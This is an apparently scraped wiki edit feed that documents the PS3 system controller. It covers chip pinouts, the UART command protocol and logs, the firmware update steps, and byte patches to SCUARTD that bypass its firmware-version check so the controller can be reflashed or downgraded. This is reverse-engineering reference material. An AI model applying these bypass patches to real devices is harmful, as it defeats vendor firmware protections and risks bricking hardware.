commands:&lt;!--// LOL //--&gt; http://pastebin.com/CNei0xbC&lt;br&gt;<br /> <br /> VERY IMPORTANT:<br /> * Max size of a command is 11 characters,16 if you count with C:&lt;hash&gt;:<br /> * Sending a command with 11 chars results in NO OUTPUT<br /> * Sending a command with more than 11 chars results in NG F0000002<br /> * Max size of a command on DECR is 135, 140 if you count with C:&lt;hash&gt;:<br /> <br /> == Syscon (SPI) EEPROM ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | F16 || CSB || Chip Select (needs to be low)<br /> |-<br /> | H16 || DO || Serial Data Output<br /> |-<br /> | G16 || DI || Serial Data Input<br /> |-<br /> | E16 || SKB || Serial Data Clock<br /> |-<br /> | J15 || WCB || Write Protect<br /> |-<br /> | J16 || RBB || Ready/Busy<br /> |-<br /> | G11 || VDDep || + 3.3V<br /> |-<br /> | C15 || VSSep || GND<br /> |-<br /> |}<br /> <br /> == Syscon JTAG ==<br /> disabled in factory after production on retailmodels<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | L8 || JRTCK || Return Test Clock<br /> |-<br /> | K8 || JTCK || Test Clock<br /> |-<br /> | K9 || JTDO || Test Data Out<br /> |-<br /> | L9 || JTMS || Test Mode State / Test Mode Select<br /> |-<br /> | K7 || JTDI || Test Data In<br /> |-<br /> | L7 || JNTRST || Test Reset<br /> |-<br /> |}<br /> <br /> = Syscon Underlaying ports =<br /> == Syscon Cell SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | M2 || /BE_SPI_CS || Chip Select<br /> |-<br /> | N2 || BE_SPI_DO || Serial Data Output<br /> |-<br /> | M1 || BE_SPI_DI || Serial Data Input<br /> |-<br /> | N1 || BE_SPI_CLK || Serial Data Clock<br /> |-<br /> | P2 || /BE_RESET || CellBE Reset<br /> |-<br /> | P1 || BE_POWGOOD || CellBE PowerGood<br /> |-<br /> | T2 || /BE_INT || CellBE Interrupt<br /> |-<br /> |}<br /> <br /> == Syscon Southbridge SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | B9 || /SB_SPI_CS || Chip Select<br /> |-<br /> | B8 || SB_SPI_DO || Serial Data Output<br /> |-<br /> | A9 || SB_SPI_DI || Serial Data Input<br /> |-<br /> | A8 || SB_SPI_CLK || Serial Data Clock<br /> |-<br /> |}<br /> <br /> &lt;!--// Remote Power ON/OFF (from network, HDMI CEC commands, etc...) is managed by devices connected to the southbridge (ethernet/wifi/BT, HDMI controller, etc...) //--&gt;<br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Syscon_Hardware&diff=44685 Syscon Hardware 2017-07-07T11:20:34Z <p>Mathieulh: /* Non retail */ Yes, JTAG is active on this syscon revision.</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SYSCON_GEN1.JPG|thumb|Syscon 1st Generation (BGA Packaging)]]&lt;br /&gt;[[File:Pyramid Syscon live probing.jpg|thumb|Pyramid Syscon live probing]]&lt;/div&gt;<br /> <br /> Syscon is the main power controller chip. It is responsible for powering up the various power systems and for configuring and initialising the [[CELL BE]], [[RSX]] and [[South Bridge]]. It communicates with these devices via seperate SPI busses. There is external access by JTAG (disabled from factory on retail models), an EEPROM programming interface &lt;!-- not fully examined --&gt; and Serial (UART). The Syscon is a SoC and consists of an ARM7TDMI (ARMv4) CPU, a 256KB EEPROM and 16KB RAM.<br /> <br /> = Serialnumbers @ SKU =<br /> <br /> == Retail ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Notes<br /> |-<br /> | [[CECHAxx]]&lt;br /&gt;[[CECHBxx]] || 0x01&lt;br /&gt;0x02 || [[COK-00x#COK-001|COK-001]] || [[CXR713120-201GB]] || 0B8E || <br /> |-<br /> | [[CECHCxx]]&lt;br /&gt;[[CECHExx]] || 0x03&lt;br /&gt;0x04 || [[COK-00x#COK-002|COK-002]] or&lt;br /&gt;[[COK-00x#COK-002W|COK-002W]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] || 0C16 || <br /> |-<br /> | [[CECHGxx]] || 0x05 || [[SEM-00x|SEM-001]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] or&lt;br /&gt;[[CXR713120-203GB]] || 0D52 ||<br /> |-<br /> | [[CECHHxx]] || 0x06 || [[DIA-00x#DIA-001|DIA-001]] || [[CXR714120-301GB]] || 0DBF ||<br /> |-<br /> | [[CECHJxx]]&lt;br /&gt;[[CECHKxx]] || 0x07 || [[DIA-00x#DIA-002|DIA-002]] || [[CXR714120-301GB]] or&lt;br /&gt;[[CXR714120-302GB]] || 0E69 || <br /> |-<br /> | [[CECHLxx]]&lt;br /&gt;[[CECHMxx]]&lt;br /&gt;[[CECHPxx]]&lt;br /&gt;[[CECHQxx]] || 0x08 || [[VER-00x|VER-001]] || [[SW-301]] or&lt;br /&gt;[[SW-302]] || 065D ||<br /> |-<br /> | [[CECH-20xx]] || 0x09 || [[DYN-00x|DYN-001]] || [[SW2-301]] || 0832 || <br /> |-<br /> | [[CECH-21xx]] || 0x0A || [[SUR-00x|SUR-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] || 08A0 || <br /> |-<br /> | [[CECH-25xx]] || 0x0B || [[JTP-00x|JTP-001]] or&lt;br /&gt;[[JSD-00x|JSD-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]]&amp;nbsp;&amp;nbsp;or&lt;br /&gt;[[SW2-303]] || 08C2 || <br /> |-<br /> | [[CECH-30xx]] || 0x0C || [[KTE-00x|KTE-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] or&lt;br /&gt;[[SW2-303]] || 0918 || <br /> |-<br /> | [[CECH-40xx]] || 0x0D || [[MSX-00x|MSX-001]] or&lt;br /&gt;[[MPX-00x|MPX-001]] || [[SW3-302]] || 098F || <br /> |-<br /> |}<br /> <br /> ==Non retail==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Active JTAG !! Notes<br /> |-<br /> | [[CEB-2040]] || - || [[MPU-501]] || [[CXR713F120|CXR713F120GB-000]] || || Yes || Retail prototype<br /> |-<br /> | [[DECR-1000|DECR1000(A/J)]] || 0x01 || [[TMU-520]] || [[CXR713F120A]] || 03FB || Yes || Reference tool<br /> |-<br /> | [[DEH-H1000A(S)(-E(S))]] || 0x01 || [[COK-001 (Prototype)]] || [[CXR713F120A]] || 0B67 || Yes || Preproduction<br /> |-<br /> | [[DEH-H1001-D]] || 0x01 || [[COOKIE-13]] || [[CXR713F120A]] || ?0B67? || Yes || Preproduction<br /> |-<br /> | [[DEH-FH1500J-A]] || || [[VERTIGO-02]] || || || || Preproduction<br /> |-<br /> &lt;!-- Not Prototype debug units - see retail --&gt;<br /> |}<br /> &lt;br/&gt;<br /> ----<br /> <br /> Not mentioned:&lt;pre&gt;<br /> 0F29 - ?<br /> 0F38 - ?&lt;/pre&gt;<br /> <br /> = Syscon Externalised Ports =<br /> '''Note:''' for more specific information per model, see the links to each subppage in the Serialnumbers @ SKU table.<br /> <br /> == Syscon UART packets ==<br /> <br /> === SCUART daemon (SCUARTD) packet structure ===<br /> <br /> SCUARTD packets includes header of 0x3 bytes and optional payload (depending on the command).<br /> Packet IDs are not important, they are used only by clients and processed by SCUART daemon. SCUART daemon opens terminal file /dev/ttyS0 and use it to send commands and receive responses.<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Size !! Description<br /> |-<br /> | 0x00 || 0x01 || Magic?<br /> |-<br /> | 0x01 || 0x01 || Payload size<br /> |-<br /> | 0x02 || 0x01 || Command<br /> |-<br /> | 0x03 || Payload size || Payload data<br /> |-<br /> |}<br /> <br /> === Packets ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Description !! Notes<br /> |-<br /> | 0x00 || '''version''' || Firmware version || Gets installed syscon's firmware version (Note: backup bank contains version 0.4.5_b4 !! On CEB-2030 it is 0.3.0 )<br /> |-<br /> | 0x01 || '''bringup''' || || &lt;!--// Standby-&gt;ON (Remote Power ON using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x02 || '''shutdown''' || || &lt;!--// ON-&gt;Standby (Remote Power OFF using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x03 || '''firmud''' || Firmware update || Notifies about firmware update operation<br /> |-<br /> | 0x04 || '''bsn''' || Board Serial Number || Retrieves syscon's Board Serial Number<br /> |-<br /> | 0x05 || '''halt''' || || Used at start of firmware update operation<br /> |-<br /> | 0x06 || '''cp ready''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x07 || '''cp busy''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x08 || '''cp reset''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x09 || '''bestat''' || Cell B.E. status || Retrieves Cell B.E. status<br /> |-<br /> | 0x0A || '''powersw''' || &lt;!-- Power switch ? --&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;!-- Reset switch ? --&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || ||<br /> |-<br /> | 0x0D || '''bootbeep on''' || ||<br /> |-<br /> | 0x0E || '''bootbeep off''' || ||<br /> |-<br /> | 0x0F || ''Reset syscon'' || Reset || Resets syscon<br /> |-<br /> | 0x10 || '''xdrdiag info''' || XDR diagnostics ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || XDR diagnostics || Starts XDR diagnostics<br /> |-<br /> | 0x12 || '''xdrdiag result''' || XDR diagnostics || Gets a result of XDR diagnostics<br /> |-<br /> | 0x13 || '''xiodiag''' || XIO diagnostics || Starts XIO diagnostics and gets a result of it<br /> |-<br /> | 0x14 || '''fandiag''' || Fan diagnostics || Retrieves RPMs of fans<br /> |-<br /> | 0x15 || '''errlog''' || Error log || Retrieves a list of codes (with timestamps) of latest errors<br /> |-<br /> | 0x16 || ''Read line'' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || Reference Tool's temperature || Gets the temperature of reference tool<br /> |-<br /> | 0x18 || rowspan=&quot;7&quot; colspan=&quot;3&quot; style=&quot;background:lightgrey; color:#ff0000; text-align: center;&quot; | Invalid CMDs<br /> |-<br /> | 0x19<br /> |-<br /> | 0x1A<br /> |-<br /> | 0x1B<br /> |-<br /> | 0x1C<br /> |-<br /> | 0x1E<br /> |-<br /> | 0x1F<br /> |-<br /> | 0x20 || '''cp beepremote''' || ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || ||<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || ||<br /> |-<br /> | ?? || '''csum''' || Checksum ?? || Calculates the Checksum of something (No packet ID listing on scuartd)<br /> |-<br /> | ?? || '''osbo''' || ??? || No idea what this does, but returns &lt;pre&gt;done&lt;/pre&gt; when it's sent &lt;!--Operative System Boot Order ?... something related with gameOS/otherOS boot flag ? --&gt;<br /> |-<br /> | ?? || '''scopen''' || returns SC_READY or ERROR 1 || ???<br /> |-<br /> | ?? || '''scclose''' || || ???<br /> |-<br /> |}<br /> <br /> === Packets Logs ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Logs !! Notes<br /> |-<br /> | 0x00 || '''version''' || &lt;pre&gt; version\nv1.0.4_c2\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x01 || '''bringup''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x02 || '''shutdown''' || &lt;pre&gt; Do nothing. (PowerOff State)\n (END) &lt;/pre&gt; || Returns (END) if the system is on <br /> |-<br /> | 0x03 || '''firmud''' || &lt;pre&gt; Start...\nErase User Program Area\n (END) &lt;/pre&gt; || This will brick your SYSCON if you don't feed it any argument or feed to it the wrong argument!<br /> |-<br /> | 0x04 || '''bsn''' || &lt;pre&gt; bsn\nNANNNNNNNNNA\n (END) &lt;/pre&gt; || N is digit and A is char (removed for privacy)<br /> |-<br /> | 0x05 || '''halt''' || &lt;pre&gt; halt\n (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x06 || '''cp ready''' || &lt;pre&gt; cp ready\nCP READY: OK\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x07 || '''cp busy''' || &lt;pre&gt; cp ready\nCP BUSY: OK\n (END) &lt;/pre&gt; || STATUS light blinks forever<br /> |-<br /> | 0x08 || '''cp reset''' || No response || Should reset CP to factory settings<br /> |-<br /> | 0x09 || '''bestat''' || &lt;pre&gt; (PowerOff State)\n (END) &lt;/pre&gt;||<br /> |-<br /> | 0x0A || '''powersw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || &lt;pre&gt; BOOT BEEP: ON\n (END) &lt;/pre&gt; || when it's off BOOT BEEP status changes to OFF<br /> |-<br /> | 0x0D || '''bootbeep on''' || &lt;pre&gt; BOOT BEEP ON: DONE\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x0E || '''bootbeep off''' || &lt;pre&gt; BOOT BEEP OFF: DONE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0F || '''Reset syscon''' || ||<br /> |-<br /> | 0x10 || '''xdrdiag info''' || &lt;pre&gt; 32\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || &lt;pre&gt; DIAG START\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x12 || '''xdrdiag result''' || &lt;pre&gt; XDR OK\n (END) &lt;/pre&gt; || will return ERROR NOT STARTED if xdrdiag start wasn't run previously<br /> |-<br /> | 0x13 || '''xiodiag''' || &lt;pre&gt; 0 903\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x14 || '''fandiag''' || &lt;pre&gt; ERROR FAN ACTIVE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x15 || '''errlog''' || &lt;pre&gt; ofst[ %d]:err_code:0x%08X, clock:0x%08X YYYY/MM/DD HH:MM:SS &lt;/pre&gt; || bunch of error logs. ends with (END) once they're over<br /> |-<br /> | 0x16 || '''Read line''' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || <br /> |-<br /> | 0x20 || '''cp beepremote''' || &lt;pre&gt; (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends a beep different than SYSCON beep :)<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends two beeps different than SYSCON beeps :)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027460C9] [68269779] [C19A855E]\n (END)&lt;/pre&gt; || displays 3 hexadecimal numbers inside rect parenthesis. the numbers are always the same, except when syscon version changes (v1.0.5_c1) <br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02746F91] [682F04DA] [27688CF5]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c2)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [0274C877] [684DA659] [EA426BB1]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027B4064] [6B450C64] [4FBF6DA3]\n (END)&lt;/pre&gt; || Another response (v1.0.3_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027E1B71] [6CDA9F25] [E0C67065]\n (END)&lt;/pre&gt; || Another response (v1.0.1_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02812855] [6E83917C] [D40F70A5]\n (END)&lt;/pre&gt; || Another response (v0.9.14_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02835059] [6FC5C632] [BB9BBEC3]\n (END)&lt;/pre&gt; || Another response (v0.9.9_c1)<br /> |-<br /> | ?? || '''osbo''' || &lt;pre&gt;done\n (END)&lt;/pre&gt; ||<br /> |-<br /> |}<br /> <br /> === Notes ===<br /> <br /> * Some commands are unavailable on earlier firmwares, for example, tmpforcp is only supported on 1.3.3+.<br /> * Some commands are divided into several strings, the first part (if exists) describes a command group, the second part describes the actual command and other parts describes command arguments.<br /> * Real syscon commands have an ASCII form (a bold text in the 2nd column) instead of bytes above.<br /> * Packet with ID *0x03* notifies syscon and calls SX program (based on ZMODEM protocol) to send firmware, syscon have custom or original implementation of RX program to receive firmware. An implementation of ZMODEM protocol used by Sony: http://oss.sony.net/Products/Linux/Others/Download/DECR-1000/mips_fp_le-lrzsz-0.12.20-devtool.1.src.rpm<br /> <br /> A start of syscon's update procedure:<br /> * A CP development tool includes several scripts which are participated in syscon update procedure. It starts after a CP update via ''update_syscon.pl'' perl script.<br /> * This script checks the current syscon's firmware version. If it is in mask rom then it skips an update procedure, if not it checks major/minor/release parts of both versions and if a new version is applicable then it launches ''scfirmup'' utility and pass the firmware file path as an argument.<br /> * ''scfirmup'' is a stupid tool which prepares a connection to SCUARTD and sends an update packet with a file path inside it. There is no need to comment it, here is reimplementation: http://pastie.org/private/6h8mfeoics4mdxear7ayg<br /> <br /> A syscon's update operation in '''SCUARTD''' consists of following steps:<br /> * 1. Check if ''SX'' program presents in ''/usr/bin/sx''. It should be a regular file.<br /> * 2. Check if specified firmware file is a regular file.<br /> * 3. Halt syscon by sending command '''halt''' to UART, then wait some time until it prints ''HALT: OK''.<br /> * 4. Reset syscon by sending byte ''0x30'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> * 5. Get current syscon's firmwave version by sending command '''version''' to UART. After receiving it, look for a character after the first ''_'' (underscore) symbol from the left side of string and if it equals to the character ''b'', then proceed to the next step, otherwise go to the (8) step. (It is possible to patch this step to allow upgrading or downgrading at will)<br /> * 6. Prepare syscon for an update by sending command '''firmud''' to UART, then fork the current process; the current process won't finish until a message ''Done'' from UART arrives (it is the end of update operation).<br /> * 7. In the forked process start ''SX'' program and pass firmware file path to it. ''SX'' program reads firmware file and transfer each chunk of it to syscon.<br /> * 8. After successful update operation reset syscon (a different way) by sending byte ''0x31'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> <br /> Notes:<br /> * It seems all scuartds checks firmware revision and probably syscon is updated only once (after factory).<br /> * To be able to reflash it you need to patch ''SCUARTD'' or do a manual update without the use of ''SCUARTD''.<br /> * You need to patch a single byte in ''SCUARTD'' to be able to flash any firmware (for example, to downgrade your syscon).<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:00403A94: /* scuartd from CP 1.3.3 */<br /> lb $v1, 1($v0)<br /> li $v0, &quot;b&quot; /* 62 00 02 24 -&gt; 63 00 02 24 */<br /> bne $v1, $v0, loc_4039F4<br /> move $a0, $zero<br /> &lt;/syntaxhighlight&gt;<br /> * An actual firmware update process (without halting and resetting steps) takes about 1 minute.<br /> * You cannot install a corrupted firmware with scfirmup unless you corrupt the header! It seems there is a hash of sorts (possibly of the plaintext) in the header preventing scfirmup from installing something corrupt<br /> * Updating SYSCON requires the DECR to be in standby mode! You cannot update it while it is on.<br /> * Corrupting the header and the body will make firmup install the SYSCON update anyways! be careful not to do it!<br /> * Should you brick SYSCON, here's a patch to &quot;unbrick&quot; it, do not use it unless you brick it though!<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:004038C0:<br /> lw $a0, 4($s4)<br /> li $a1, 0x400000<br /> nop<br /> addiu $a1, (aHalt - 0x400000) # &quot;halt&quot;<br /> la $t9, scuartd_send_sccmd<br /> nop<br /> jalr $t9 ; scuartd_send_sccmd<br /> nop<br /> lw $gp, 0x1E8+var_1D8($sp)<br /> bnez $v0, loc_4039B4 /* 33 00 40 14 -&gt; 33 00 40 10 */<br /> li $a0, 1<br /> &lt;/syntaxhighlight&gt;<br /> <br /> * You can use this bruteforcer to try your luck when finding new packets : https://hastebin.com/vomogesaru.cpp<br /> <br /> == Syscon UART ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | P16 || UART0_TxD || Serial Transmit<br /> |-<br /> | P15 || UART0_RxD || Serial Receive<br /> |-<br /> |}<br /> <br /> You can attach a 3.3v TTL cable (LV-TTL) to the UART on syscon (UART0_TxD, UART0_RxD). (Convenient solder points are available on JSD/JTP-001 by the NOR test points. They are marked as '?' in [[:File:JSD-001 NOR - nor testpoints.png|marcan' noraliser / judges' NORway install picture]], closest to the ground at the bottom - RX is left, TX is right) Baud rate is 57600. There is a simple plaintext protocol involved. This varies on different syscon models. Example:<br /> <br /> '''&lt;command&gt;:&lt;hash&gt;'''<br /> <br /> Where the hash is the sum of command bytes &amp; 0xFF<br /> <br /> you should terminate commands with \r\n, the syscon messages are only terminated with \n<br /> <br /> === Samples ===<br /> Here are some of the commands/messages encountered:<br /> <br /> Messages:<br /> &lt;pre&gt;Power applied (standby mode)<br /> OK 00000000:3A<br /> <br /> Power on<br /> # (PowerOn State):7F<br /> <br /> Power off (Hard shutdown)<br /> # (PowerOff State):DD<br /> <br /> After Fan test:<br /> # (PowerOff State) (Fatal):36<br /> <br /> No text, invalid hash:<br /> NG F0000002:4D&lt;/pre&gt;<br /> <br /> Commands:<br /> &lt;pre&gt;VER:ED<br /> OK 00000000 S1E 00 00 065D:A4<br /> <br /> ERRLOG:CB<br /> OK 00000000:3A<br /> <br /> DATE:1E<br /> NG F0000003:4E<br /> <br /> C:F1:BUZ<br /> E:4F:NG F0000004<br /> <br /> C:D0:CID<br /> E:50:NG F0000005<br /> <br /> C:DA:EEP<br /> E:50:NG F0000005<br /> <br /> C:D5:FAN<br /> E:50:NG F0000005<br /> <br /> C:F4:KSV<br /> E:50:NG F0000005<br /> <br /> C:ED:REV<br /> E:50:NG F0000005<br /> <br /> C:F8:SPU<br /> E:50:NG F0000005&lt;/pre&gt;<br /> more [[Talk:System_Controller_Firmware#Syscon_commands|Syscon commands]]<br /> <br /> bruteforcing commands:&lt;!--// LOL //--&gt; http://pastebin.com/CNei0xbC&lt;br&gt;<br /> <br /> VERY IMPORTANT:<br /> * Max size of a command is 11 characters,16 if you count with C:&lt;hash&gt;:<br /> * Sending a command with 11 chars results in NO OUTPUT<br /> * Sending a command with more than 11 chars results in NG F0000002<br /> * Max size of a command on DECR is 135, 140 if you count with C:&lt;hash&gt;:<br /> <br /> == Syscon (SPI) EEPROM ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | F16 || CSB || Chip Select (needs to be low)<br /> |-<br /> | H16 || DO || Serial Data Output<br /> |-<br /> | G16 || DI || Serial Data Input<br /> |-<br /> | E16 || SKB || Serial Data Clock<br /> |-<br /> | J15 || WCB || Write Protect<br /> |-<br /> | J16 || RBB || Ready/Busy<br /> |-<br /> | G11 || VDDep || + 3.3V<br /> |-<br /> | C15 || VSSep || GND<br /> |-<br /> |}<br /> <br /> == Syscon JTAG ==<br /> disabled in factory after production on retailmodels<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | L8 || JRTCK || Return Test Clock<br /> |-<br /> | K8 || JTCK || Test Clock<br /> |-<br /> | K9 || JTDO || Test Data Out<br /> |-<br /> | L9 || JTMS || Test Mode State / Test Mode Select<br /> |-<br /> | K7 || JTDI || Test Data In<br /> |-<br /> | L7 || JNTRST || Test Reset<br /> |-<br /> |}<br /> <br /> = Syscon Underlaying ports =<br /> == Syscon Cell SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | M2 || /BE_SPI_CS || Chip Select<br /> |-<br /> | N2 || BE_SPI_DO || Serial Data Output<br /> |-<br /> | M1 || BE_SPI_DI || Serial Data Input<br /> |-<br /> | N1 || BE_SPI_CLK || Serial Data Clock<br /> |-<br /> | P2 || /BE_RESET || CellBE Reset<br /> |-<br /> | P1 || BE_POWGOOD || CellBE PowerGood<br /> |-<br /> | T2 || /BE_INT || CellBE Interrupt<br /> |-<br /> |}<br /> <br /> == Syscon Southbridge SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | B9 || /SB_SPI_CS || Chip Select<br /> |-<br /> | B8 || SB_SPI_DO || Serial Data Output<br /> |-<br /> | A9 || SB_SPI_DI || Serial Data Input<br /> |-<br /> | A8 || SB_SPI_CLK || Serial Data Clock<br /> |-<br /> |}<br /> <br /> &lt;!--// Remote Power ON/OFF (from network, HDMI CEC commands, etc...) is managed by devices connected to the southbridge (ethernet/wifi/BT, HDMI controller, etc...) //--&gt;<br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:Prototype_models:DEHR&diff=44671 Template:Prototype models:DEHR 2017-07-03T13:56:07Z <p>Mathieulh: DEH-R1040 is 100% identical to DECR-1000 units.</p> <hr /> <div>{{ed right|Prototype models:DEHR}}<br /> <br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;7&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Model !! [[SKU_Models#Datecode_/_Manufacturing_Date | SKU&lt;br/&gt;Release&lt;br/&gt;date]] !! Codename !! [[Motherboard Revisions|Board]] !! [[CELL BE]] {{90nm}} !! [[RAM]] !! [[Flash_(Hardware)|Flash]] !! GPU&lt;br /&gt;{{90nm}} !! GPU interface !! VRAM !! [[Bluray Drive]] !! Video Ports !! [[GbLAN|Gb-LAN Ports]] !! Case !! [[Target ID|Console Type]] !! [[System Software|FW @&lt;BR /&gt;Release&lt;BR /&gt;date]] !! Notes<br /> &lt;!--// <br /> |-<br /> | &lt;span style=&quot;color:red;&quot;&gt;[[DEH-R103X]]&lt;/span&gt; || (Apr, 2005) &lt;br /&gt; NOT RELEASED || Cytology || ? || &lt;span style=&quot;color:orange;&quot;&gt;3.2GHz v3&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB NAND&lt;/span&gt; || &lt;span style=&quot;color:#E9866A;&quot;&gt;RSX Prototype&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;FlexIO&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;128bit 256MB&lt;/span&gt; || &lt;span style=&quot;color:orange;&quot;&gt;Prototype&lt;/span&gt; || ? || ? || ? || {{DECR}} || - || Final controller (Later Released as [[DEH-R1030]])<br /> |-<br /> | &lt;span style=&quot;color:red;&quot;&gt;[[DEH-R104X]]&lt;/span&gt; || (May, 2005) &lt;br /&gt; NOT RELEASED || Cytology || ? || &lt;span style=&quot;color:orange;&quot;&gt;3.2GHz v3&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB NAND&lt;/span&gt; || &lt;span style=&quot;color:#E9866A;&quot;&gt;RSX Prototype&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;FlexIO&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;128bit 256MB&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;Final&lt;/span&gt; || ? || ? || ? || {{DECR}} || - || Final TOOL unit (Later Released as [[DEH-R1040]])<br /> //--&gt;<br /> |-<br /> | [[DEH-R1000|DEH-R1000]] || Nov/Dec, 2005 || - || [[TMU-510]] || &lt;span style=&quot;color:green;&quot;&gt;3.2GHz v3.2&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB NAND&lt;/span&gt; || &lt;span style=&quot;color:#E9866A;&quot;&gt;RSX Prototype&lt;/span&gt; || ?&lt;span style=&quot;color:green;&quot;&gt;FlexIO&lt;/span&gt; &lt;span style=&quot;color:orange;&quot;&gt;(Protoype)&lt;/span&gt;? || &lt;span style=&quot;color:green;&quot;&gt;128bit 256MB&lt;/span&gt; || {{NO}} || 2x HDMI , AV Multi-Out, VGA || 3 + DEV-Lan || Looks almost like the [[DECR-1000]] || {{DECR}} || [[060.004]] || CP: [[TCP-510]]<br /> |-<br /> | [[DEH-R1010]], 